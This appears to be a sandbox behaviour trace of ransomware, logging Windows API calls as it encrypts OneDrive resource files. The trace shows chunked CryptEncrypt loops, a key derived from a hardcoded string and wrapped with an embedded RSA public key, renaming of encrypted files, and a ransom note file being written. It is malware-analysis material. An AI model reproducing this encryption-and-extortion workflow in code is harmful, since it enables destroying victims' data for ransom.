hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.262] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.263] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.264] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.265] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.266] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2c0, lpOverlapped=0x0) returned 1 [0271.267] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2c0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0) returned 1 [0271.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0271.267] CloseHandle (hObject=0x5d3c) returned 1 [0271.267] CloseHandle (hObject=0x5d4c) returned 1 [0271.267] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0271.272] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0271.273] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0271.274] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0271.276] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0271.276] CryptDestroyKey (hKey=0x2fa788) returned 1 [0271.276] CryptReleaseContext (hProv=0x2f27e58, dwFlags=0x0) returned 1 [0271.276] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.276] FindClose (in: hFindFile=0x2fa748 | out: hFindFile=0x2fa748) returned 1 [0271.276] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\readme_back_files.htm")) returned 0xffffffff [0271.276] AreFileApisANSI () returned 1 [0271.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0271.277] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.277] GetFileType (hFile=0x5d48) returned 0x1 [0271.278] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.279] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.279] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa208 [0271.281] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.281] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.281] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.281] GetLastError () returned 0x0 [0271.281] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.281] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.282] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.283] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\it\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.284] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\it\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.284] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28a08) returned 1 [0271.287] CryptCreateHash (in: hProv=0x2f28a08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.287] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.287] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.287] CryptDeriveKey (in: hProv=0x2f28a08, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa748) returned 1 [0271.288] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.288] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.288] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f28100) returned 1 [0271.288] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28100, dwCertEncodingType=0x1, pInfo=0x2f32ab0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32ae0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32ae8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fa788) returned 1 [0271.288] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.288] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27cc0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f27cc0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.288] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f27cc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f27cc0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 